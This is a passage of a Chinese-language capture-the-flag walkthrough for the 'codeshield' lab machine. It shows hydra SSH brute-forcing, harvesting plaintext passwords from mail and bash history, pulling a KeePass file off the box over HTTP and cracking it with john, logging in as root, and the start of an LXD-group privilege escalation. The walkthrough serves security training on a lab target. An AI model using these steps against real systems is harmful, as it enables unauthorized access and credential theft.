Angelina,Johnson
Kevin,Vaidez

然后就可以使用脚本了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌──(kali💀kali)-[~/temp/codeshield/generate-ad-username]
└─$ python3 ADGenerator.py user > ../user

┌──(kali💀kali)-[~/temp/codeshield/generate-ad-username]
└─$ cat ../user | head -n 10
jessicacarlson
jessica-carlson
jessica.carlson
jescar
jes-car
jes.car
jcarlson
j-carlson
j.carlson
carlsonjessica

尝试爆破即可,需要注意到主机上存在2222222两个ssh端口,需要进行甄别:

1
2
3
4
5
6
7

┌──(kali💀kali)-[~/temp/codeshield]
└─$ ssh valdezk@$IP -p 22222
The authenticity of host '[10.0.2.22]:22222 ([10.0.2.22]:22222)' can't be established.
ED25519 key fingerprint is SHA256:Y+iV2eHvzSBp6ZbF+2VqTJdZ5+XyH5tVaxNCzS7tp3I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? 
Host key verification failed.

发现公钥不匹配,临时禁用主机密钥验证(仅限内网测试)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

┌──(kali💀kali)-[~/temp/codeshield]
└─$ ssh -o StrictHostKeyChecking=no hgbe@10.0.2.22    
Warning: Permanently added '10.0.2.22' (ED25519) to the list of known hosts.
hgbe@10.0.2.22's password: 

                                                                                                                                                                                             
┌──(kali💀kali)-[~/temp/codeshield]
└─$ ssh -o StrictHostKeyChecking=no hgbe@10.0.2.22 -p 22222
             @@@                            
      @@@@@@@@@  @@@@@@                     
 @@@@@@@@@@@@@@          (@@                
 @@@@@@@@@@@@@@           @@    ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗                                   
 @@@@@@@@@@@@@@           @@   ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗             
  @@@@@@@@@@@@@          @@    ██║     ██║   ██║██║  ██║█████╗  ███████╗███████║██║█████╗  ██║     ██║  ██║             
  @@@@@@@@@@@@@         @@@    ██║     ██║   ██║██║  ██║██╔══╝  ╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║             
    @@@@@@@@@@@        @@      ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║  ██║██║███████╗███████╗██████╔╝             
     @@@@@@@@@@      @@@        ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝              
        @@@@@@@   @@@                       
           @@@@@@@                                                           

  _______________________________________________________________________________________________________
 |  _WARNING: This system is restricted to authorized users!___________________________________________  |
 | |                                                                                                   | |
 | | IT IS AN OFFENSE TO CONTINUE WITHOUT PROPER AUTHORIZATION.                                        | |
 | |                                                                                                   | |
 | | This system is restricted to authorized users.                                                    | | 
 | | Individuals who attempt unauthorized access will be prosecuted.                                   | | 
 | | If you're unauthorized, terminate access now!                                                     | | 
 | |                                                                                                   | |
 | |                                                                                                   | |
 | |___________________________________________________________________________________________________| |
 |_______________________________________________________________________________________________________|
hgbe@10.0.2.22's password:

很明显,优先尝试下面的,尝试爆破,由于看了师傅们的结果我这里就直接做做样子了。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

┌──(kali💀kali)-[~/temp/codeshield]
└─$ hydra -L user -P pass ssh://$IP -f -s 22222 -V 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-30 02:29:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:2/p:10), ~2 tries per task
[DATA] attacking ssh://10.0.2.22:22222/
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxx001" - 1 of 20 [child 0] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Password123!" - 2 of 20 [child 1] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Greatplace2work!" - 3 of 20 [child 2] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Diciembre@2017" - 4 of 20 [child 3] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Hairdresser1!" - 5 of 20 [child 4] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "1qa2ws3ed4rf" - 6 of 20 [child 5] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "XXXX12345678" - 7 of 20 [child 6] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Hairdresser1" - 8 of 20 [child 7] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxx002" - 9 of 20 [child 8] (0/0)
[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxxx01" - 10 of 20 [child 9] (0/0)
[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Xxxxxxxxx001" - 11 of 20 [child 10] (0/0)
[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Password123!" - 12 of 20 [child 11] (0/0)
[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Greatplace2work!" - 13 of 20 [child 12] (0/0)
[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Diciembre@2017" - 14 of 20 [child 13] (0/0)
[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Hairdresser1!" - 15 of 20 [child 14] (0/0)
[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "1qa2ws3ed4rf" - 16 of 20 [child 15] (0/0)
[22222][ssh] host: 10.0.2.22   login: valdezk   password: Greatplace2work!
[STATUS] attack finished for 10.0.2.22 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-30 02:29:23

得到一串新的凭证:

1

valdezk:Greatplace2work!

登录看一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106

┌──(kali💀kali)-[~/temp/codeshield]
└─$ ssh -o StrictHostKeyChecking=no valdezk@10.0.2.22 -p 22222
             @@@                            
      @@@@@@@@@  @@@@@@                     
 @@@@@@@@@@@@@@          (@@                
 @@@@@@@@@@@@@@           @@    ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗                                   
 @@@@@@@@@@@@@@           @@   ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗             
  @@@@@@@@@@@@@          @@    ██║     ██║   ██║██║  ██║█████╗  ███████╗███████║██║█████╗  ██║     ██║  ██║             
  @@@@@@@@@@@@@         @@@    ██║     ██║   ██║██║  ██║██╔══╝  ╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║             
    @@@@@@@@@@@        @@      ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║  ██║██║███████╗███████╗██████╔╝             
     @@@@@@@@@@      @@@        ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝              
        @@@@@@@   @@@                       
           @@@@@@@                                                           

  _______________________________________________________________________________________________________
 |  _WARNING: This system is restricted to authorized users!___________________________________________  |
 | |                                                                                                   | |
 | | IT IS AN OFFENSE TO CONTINUE WITHOUT PROPER AUTHORIZATION.                                        | |
 | |                                                                                                   | |
 | | This system is restricted to authorized users.                                                    | | 
 | | Individuals who attempt unauthorized access will be prosecuted.                                   | | 
 | | If you're unauthorized, terminate access now!                                                     | | 
 | |                                                                                                   | |
 | |                                                                                                   | |
 | |___________________________________________________________________________________________________| |
 |_______________________________________________________________________________________________________|
valdezk@10.0.2.22's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-79-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri May 30 06:36:11 AM UTC 2025

  System load:  0.169921875        Processes:               245
  Usage of /:   29.4% of 47.93GB   Users logged in:         0
  Memory usage: 64%                IPv4 address for enp0s3: 10.0.2.22
  Swap usage:   1%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
New release '24.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


valdezk@codeshield:~$ whoami;id;pwd
valdezk
uid=1007(valdezk) gid=1007(valdezk) groups=1007(valdezk)
/home/valdezk
valdezk@codeshield:~$ ls -la
total 172
drwxr-x--- 18 valdezk valdezk  4096 Aug 29  2023 .
drwxr-xr-x 14 root    root     4096 Aug 26  2023 ..
-rw-rw-r--  1 valdezk valdezk     0 Aug 28  2023 .bash_history
-rw-r--r--  1 valdezk valdezk   220 Aug 26  2023 .bash_logout
-rw-r--r--  1 valdezk valdezk  3771 Aug 26  2023 .bashrc
drwx------ 12 valdezk valdezk  4096 May 30 06:29 .cache
drwx------ 11 valdezk valdezk  4096 Aug 28  2023 .config
drwxr-xr-x  2 valdezk valdezk  4096 Aug 28  2023 Desktop
drwxr-xr-x  2 valdezk valdezk  4096 Aug 28  2023 Documents
drwxr-xr-x  2 valdezk valdezk  4096 Aug 28  2023 Downloads
drwx------  3 valdezk valdezk  4096 Aug 28  2023 .local
drwx------  3 valdezk valdezk  4096 Aug 28  2023 .mozilla
drwxr-xr-x  2 valdezk valdezk  4096 Aug 28  2023 Music
drwxrwxrwt  2 valdezk valdezk  4096 Aug 29  2023 .pcsc10
drwxr-xr-x  2 valdezk valdezk  4096 Aug 28  2023 Pictures
-rw-r--r--  1 valdezk valdezk   807 Aug 26  2023 .profile
drwxr-xr-x  2 valdezk valdezk  4096 Aug 28  2023 Public
drwx------  3 valdezk valdezk  4096 Aug 28  2023 snap
drwxr-xr-x  2 valdezk valdezk  4096 Aug 28  2023 Templates
drwxrwxr-t  2 valdezk valdezk  4096 Aug 29  2023 thinclient_drives
drwx------  6 valdezk valdezk  4096 Aug 28  2023 .thunderbird
-rw-r-----  1 valdezk valdezk     5 Aug 29  2023 .vboxclient-clipboard-tty1-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-clipboard-tty2-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-clipboard-tty4-control.pid
-rw-r-----  1 valdezk valdezk     5 Aug 29  2023 .vboxclient-draganddrop-tty1-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-draganddrop-tty2-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-draganddrop-tty4-control.pid
-rw-r-----  1 valdezk valdezk     5 Aug 29  2023 .vboxclient-hostversion-tty1-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-hostversion-tty2-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-hostversion-tty4-control.pid
-rw-r-----  1 valdezk valdezk     5 Aug 29  2023 .vboxclient-seamless-tty1-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-seamless-tty2-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-seamless-tty4-control.pid
-rw-r-----  1 valdezk valdezk     5 Aug 29  2023 .vboxclient-vmsvga-session-tty1-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-vmsvga-session-tty2-control.pid
-rw-r-----  1 valdezk valdezk     6 Aug 28  2023 .vboxclient-vmsvga-session-tty4-control.pid
drwxr-xr-x  2 valdezk valdezk  4096 Aug 28  2023 Videos
-rw-------  1 valdezk valdezk    56 Aug 29  2023 .Xauthority
-rw-r--r--  1 valdezk valdezk 18728 Aug 29  2023 .xorgxrdp.10.log
-rw-------  1 valdezk valdezk  3985 Aug 29  2023 .xsession-errors

可以!

提权

信息搜集

找一下密码:

1

valdezk@codeshield:~$ grep -Pnir pass

然后找到了一个:

1

.thunderbird/fx2h7mhy.default-release/ImapMail/mail.codeshield.hmv/INBOX:Password: D@taWh1sperer!

爆破新用户

然后找一下有没有类似的用户名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76

valdezk@codeshield:~$ cut -d: -f1 /etc/passwd
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
_apt
systemd-network
systemd-resolve
messagebus
systemd-timesync
pollinate
sshd
syslog
uuidd
tcpdump
tss
landscape
fwupd-refresh
usbmux
earlyp
lxd
rtkit
dnsmasq
kernoops
systemd-oom
whoopsie
avahi-autoipd
nm-openvpn
avahi
cups-pk-helper
sssd
speech-dispatcher
saned
colord
geoclue
pulse
gnome-initial-setup
hplip
gdm
vboxadd
ftp
cowrie
mysql
postfix
dovecot
dovenull
clamav
amavis
debian-spamd
vmail
mlmmj
iredadmin
iredapd
netdata
postgres
mitchellt
valdezk
carlsonj
mansourm
tanx
coccia
xrdp

和之前的用户名对比一下:

1
2
3
4
5
6
7
8

┌──(kali💀kali)-[~/temp/codeshield/generate-ad-username]
└─$ grep -F -f user1 user2                                 
earlyp
mitchellt
carlsonj
mansourm
tanx
coccia

存在几个用户名相同,用这里的用户名进行爆破:

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali💀kali)-[~/temp/codeshield/generate-ad-username]
└─$ hydra -L user3 -p D@taWh1sperer! ssh://$IP:22222 -f
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-30 02:51:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://10.0.2.22:22222/
[22222][ssh] host: 10.0.2.22   login: mitchellt   password: D@taWh1sperer!
[STATUS] attack finished for 10.0.2.22 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-30 02:51:40

得到新用户,直接切换:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

valdezk@codeshield:~$ su mitchellt
Password: 
mitchellt@codeshield:/home/valdezk$ cd ~
mitchellt@codeshield:~$ ls -la
total 112
drwxr-x--- 17 mitchellt mitchellt 4096 Aug 30  2023 .
drwxr-xr-x 14 root      root      4096 Aug 26  2023 ..
-rw-------  1 mitchellt mitchellt  209 Aug 30  2023 .bash_history
-rw-r--r--  1 mitchellt mitchellt  220 Aug 26  2023 .bash_logout
-rw-r--r--  1 mitchellt mitchellt 3771 Aug 26  2023 .bashrc
drwx------ 11 mitchellt mitchellt 4096 May 30 06:51 .cache
drwx------ 12 mitchellt mitchellt 4096 Aug 29  2023 .config
drwxr-xr-x  2 mitchellt mitchellt 4096 Aug 28  2023 Desktop
drwxr-xr-x  2 mitchellt mitchellt 4096 Aug 28  2023 Documents
drwxr-xr-x  2 mitchellt mitchellt 4096 Aug 28  2023 Downloads
-rw-------  1 mitchellt mitchellt   20 Aug 29  2023 .lesshst
drwx------  3 mitchellt mitchellt 4096 Aug 28  2023 .local
drwxrwxr-x  6 mitchellt mitchellt 4096 Aug 30  2023 mining
drwx------  3 mitchellt mitchellt 4096 Aug 28  2023 .mozilla
drwxr-xr-x  2 mitchellt mitchellt 4096 Aug 28  2023 Music
drwxr-xr-x  2 mitchellt mitchellt 4096 Aug 28  2023 Pictures
-rw-r--r--  1 mitchellt mitchellt  807 Aug 26  2023 .profile
drwxr-xr-x  2 mitchellt mitchellt 4096 Aug 28  2023 Public
drwx------  3 mitchellt mitchellt 4096 Aug 29  2023 snap
drwxr-xr-x  2 mitchellt mitchellt 4096 Aug 28  2023 Templates
drwx------  6 mitchellt mitchellt 4096 Aug 28  2023 .thunderbird
-rwxrwx---  1 mitchellt mitchellt 2401 Aug 28  2023 user.txt
-rw-r-----  1 mitchellt mitchellt    6 Aug 30  2023 .vboxclient-clipboard-tty2-control.pid
-rw-r-----  1 mitchellt mitchellt    6 Aug 30  2023 .vboxclient-draganddrop-tty2-control.pid
-rw-r-----  1 mitchellt mitchellt    6 Aug 30  2023 .vboxclient-hostversion-tty2-control.pid
-rw-r-----  1 mitchellt mitchellt    6 Aug 30  2023 .vboxclient-seamless-tty2-control.pid
-rw-r-----  1 mitchellt mitchellt    6 Aug 30  2023 .vboxclient-vmsvga-session-tty2-control.pid
drwxr-xr-x  2 mitchellt mitchellt 4096 Aug 28  2023 Videos
mitchellt@codeshield:~$ cat user.txt 
             @@@                            
      @@@@@@@@@  @@@@@@                     
 @@@@@@@@@@@@@@          (@@                
 @@@@@@@@@@@@@@           @@    ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗  
 @@@@@@@@@@@@@@           @@   ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗ 
  @@@@@@@@@@@@@          @@    ██║     ██║   ██║██║  ██║█████╗  ███████╗███████║██║█████╗  ██║     ██║  ██║ 
  @@@@@@@@@@@@@         @@@    ██║     ██║   ██║██║  ██║██╔══╝  ╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║ 
    @@@@@@@@@@@        @@      ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║  ██║██║███████╗███████╗██████╔╝ 
     @@@@@@@@@@      @@@        ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝  
        @@@@@@@   @@@                       
           @@@@@@@                          

  _______________________________________________________________________________________________________
 |  _USER FLAG!________________________________________________________________________________________  |
 | |                                                                                                   | |
 | | Your_password_is_the_key_to_your_digital_life                                                     | |
 | |                                                                                                   | |
 | |___________________________________________________________________________________________________| |
 |_______________________________________________________________________________________________________|

history找到明文密码

1
2
3
4
5
6
7
8

mitchellt@codeshield:~$ cat .bash_history 
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining ."
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining /tmp"
cp -r /tmp/mining .
ls
cd mining/
ls
exit

得到新密码EARL!YP7DeVel@OP,切换就行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

mitchellt@codeshield:~$ su - earlyp
Password: 
earlyp@codeshield:~$ ls -la
total 116
drwxr-x--- 19 earlyp earlyp 4096 Aug 29  2023 .
drwxr-xr-x 14 root   root   4096 Aug 26  2023 ..
-rw-------  1 earlyp earlyp   36 Aug 29  2023 .bash_history
-rw-r--r--  1 earlyp earlyp  220 Jan  6  2022 .bash_logout
-rw-r--r--  1 earlyp earlyp 3771 Jan  6  2022 .bashrc
drwx------ 12 earlyp earlyp 4096 Aug 23  2023 .cache
drwx------ 16 earlyp earlyp 4096 Aug 28  2023 .config
drwxr-xr-x  2 earlyp earlyp 4096 Aug 22  2023 Desktop
drwxrwxr-x  3 earlyp earlyp 4096 Aug 28  2023 Development
drwxr-xr-x  2 earlyp earlyp 4096 Aug 28  2023 Documents
drwxr-xr-x  5 earlyp earlyp 4096 Aug 23  2023 Downloads
drwx------  2 earlyp earlyp 4096 Aug 28  2023 .gnupg
drwx------  3 earlyp earlyp 4096 Aug 22  2023 .local
drwxrwxr-x  6 earlyp earlyp 4096 Aug 29  2023 mining
drwxrwxr-x  2 earlyp earlyp 4096 Aug 23  2023 .mono
drwxr-xr-x  2 earlyp earlyp 4096 Aug 22  2023 Music
drwxr-xr-x  3 earlyp earlyp 4096 Aug 23  2023 Pictures
-rw-r--r--  1 earlyp earlyp  807 Jan  6  2022 .profile
drwxr-xr-x  2 earlyp earlyp 4096 Aug 22  2023 Public
-rw-rw-r--  1 earlyp earlyp  233 Aug 23  2023 .recently-used
drwx------  3 earlyp earlyp 4096 Aug 22  2023 snap
drwx------  2 earlyp earlyp 4096 Aug 22  2023 .ssh
-rw-r--r--  1 earlyp earlyp    0 Aug 22  2023 .sudo_as_admin_successful
drwxr-xr-x  2 earlyp earlyp 4096 Aug 22  2023 Templates
-rw-r-----  1 earlyp earlyp    6 Aug 28  2023 .vboxclient-clipboard-tty2-control.pid
-rw-r-----  1 earlyp earlyp    6 Aug 28  2023 .vboxclient-draganddrop-tty2-control.pid
-rw-r-----  1 earlyp earlyp    6 Aug 28  2023 .vboxclient-hostversion-tty2-control.pid
-rw-r-----  1 earlyp earlyp    6 Aug 28  2023 .vboxclient-seamless-tty2-control.pid
-rw-r-----  1 earlyp earlyp    6 Aug 28  2023 .vboxclient-vmsvga-session-tty2-control.pid
drwxr-xr-x  2 earlyp earlyp 4096 Aug 22  2023 Videos

提权root(方法一:kdbx文件)

信息搜集可以找到一个.kdbx文件,破解一下即可得到root密码:

1

earlyp@codeshield:~$ grep -Pnir password

找到一个密码文件:

1
2
3

.cache/keepassxc/keepassxc.ini:2:LastActiveDatabase=/home/earlyp/Documents/Passwords.kdbx
.cache/keepassxc/keepassxc.ini:4:LastDatabases=/home/earlyp/Documents/Passwords.kdbx
.cache/keepassxc/keepassxc.ini:6:LastOpenedDatabases=/home/earlyp/Documents/Passwords.kdbx

拷贝到本地进行破解:

1
2
3
4
5
6
7
8
9
10
11

earlyp@codeshield:~$ cd Documents/
earlyp@codeshield:~/Documents$ ls -la
total 12
drwxr-xr-x  2 earlyp earlyp 4096 Aug 28  2023 .
drwxr-x--- 19 earlyp earlyp 4096 Aug 29  2023 ..
-rw-------  1 earlyp earlyp 1918 Aug 28  2023 Passwords.kdbx
earlyp@codeshield:~/Documents$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.0.2.4 - - [30/May/2025 07:05:05] "GET /Passwords.kdbx HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

┌──(kali💀kali)-[~/temp/codeshield]
└─$ wget http://$IP:8888/Passwords.kdbx
--2025-05-30 03:26:21--  http://10.0.2.22:8888/Passwords.kdbx
Connecting to 10.0.2.22:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1918 (1.9K) [application/octet-stream]
Saving to: ‘Passwords.kdbx’

Passwords.kdbx                                  100%[====================================================================================================>]   1.87K  --.-KB/s    in 0s      

2025-05-30 03:26:21 (198 MB/s) - ‘Passwords.kdbx’ saved [1918/1918]

┌──(kali💀kali)-[~/temp/codeshield]
└─$ keepass2john Passwords.kdbx > hash

┌──(kali💀kali)-[~/temp/codeshield]
└─$ john hash --wordlist=pass 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 3225806 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 DONE (2025-05-30 03:27) 0g/s 2.309p/s 2.309c/s 2.309C/s Xxxxxxxxx002..Xxxxxxxxxx01
Session completed.

那只能rockyou了,这里快速剽窃了一下密码:

1

mandalorian

去在线的管理器上看一下密码:

image-20250530155148306

1

root:7%z5,c9=w6[x8=

切换用户拿到rootshell!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

earlyp@codeshield:~/Documents$ su - root
Password: 
root@codeshield:~# ls -la
total 92
drwx------  9 root root 4096 Aug 26  2023 .
drwxr-xr-x 19 root root 4096 Aug 22  2023 ..
-rw-------  1 root root    0 Aug 30  2023 .bash_history
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwx------  2 root root 4096 Aug 28  2023 .cache
drwxr-xr-x  2 root root 4096 Aug 26  2023 cowrie
drwxr-xr-x  3 root root 4096 Aug 26  2023 .iredmail
drwx------  3 root root 4096 Aug 23  2023 .launchpadlib
-rw-------  1 root root   20 Aug 23  2023 .lesshst
drwxr-xr-x  3 root root 4096 Aug 22  2023 .local
-r--------  1 root root   45 Aug 26  2023 .my.cnf
-rw-r--r--  1 root root   91 Aug 26  2023 .my.cnf-amavisd
-rw-r--r--  1 root root   92 Aug 26  2023 .my.cnf-fail2ban
-rw-r--r--  1 root root   93 Aug 26  2023 .my.cnf-iredadmin
-rw-r--r--  1 root root   91 Aug 26  2023 .my.cnf-iredapd
-rw-r--r--  1 root root   93 Aug 26  2023 .my.cnf-roundcube
-r--------  1 root root   89 Aug 26  2023 .my.cnf-vmail
-r--------  1 root root   94 Aug 26  2023 .my.cnf-vmailadmin
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root 2528 Aug 26  2023 root.txt
-rw-r--r--  1 root root   66 Aug 26  2023 .selected_editor
drwx------  4 root root 4096 Aug 22  2023 snap
drwx------  2 root root 4096 Aug 22  2023 .ssh
-rw-r--r--  1 root root    0 Aug 22  2023 .sudo_as_admin_successful
-rw-r--r--  1 root root  290 Aug 26  2023 .wget-hsts
root@codeshield:~# cat root.txt 

             @@@                            
      @@@@@@@@@  @@@@@@                     
 @@@@@@@@@@@@@@          (@@                
 @@@@@@@@@@@@@@           @@    ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗                                   
 @@@@@@@@@@@@@@           @@   ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗             
  @@@@@@@@@@@@@          @@    ██║     ██║   ██║██║  ██║█████╗  ███████╗███████║██║█████╗  ██║     ██║  ██║             
  @@@@@@@@@@@@@         @@@    ██║     ██║   ██║██║  ██║██╔══╝  ╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║             
    @@@@@@@@@@@        @@      ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║  ██║██║███████╗███████╗██████╔╝             
     @@@@@@@@@@      @@@        ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝              
        @@@@@@@   @@@                       
           @@@@@@@                                                           

  _______________________________________________________________________________________________________
 |  _ROOT FLAG!________________________________________________________________________________________  |
 | |                                                                                                   | |
 | | Educate_your_employees_on_password_safety                                                         | |
 | |                                                                                                   | |
 | |___________________________________________________________________________________________________| |
 |_______________________________________________________________________________________________________|

提权root(方法2:lxd)

也是看别的师傅的思路的,真没注意到,原因是一个特殊的组权限:

1
2

earlyp@codeshield:~$ id
uid=1000(earlyp) gid=1000(earlyp) groups=1000(earlyp),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd)

参考:https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.html#with-internet

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106

# kali
┌──(kali💀kali)-[~/temp/codeshield]
└─$ git clone https://github.com/saghul/lxd-alpine-builder
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42 (from 1)
Receiving objects: 100% (50/50), 3.11 MiB | 3.21 MiB/s, done.
Resolving deltas: 100% (15/15), done.

┌──(kali💀kali)-[~/temp/codeshield]
└─$ cd lxd-alpine-builder

┌──(kali💀kali)-[~/temp/codeshield/lxd-alpine-builder]
└─$ sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine

┌──(kali💀kali)-[~/temp/codeshield/lxd-alpine-builder]
└─$ sudo ./build-alpine -a i686
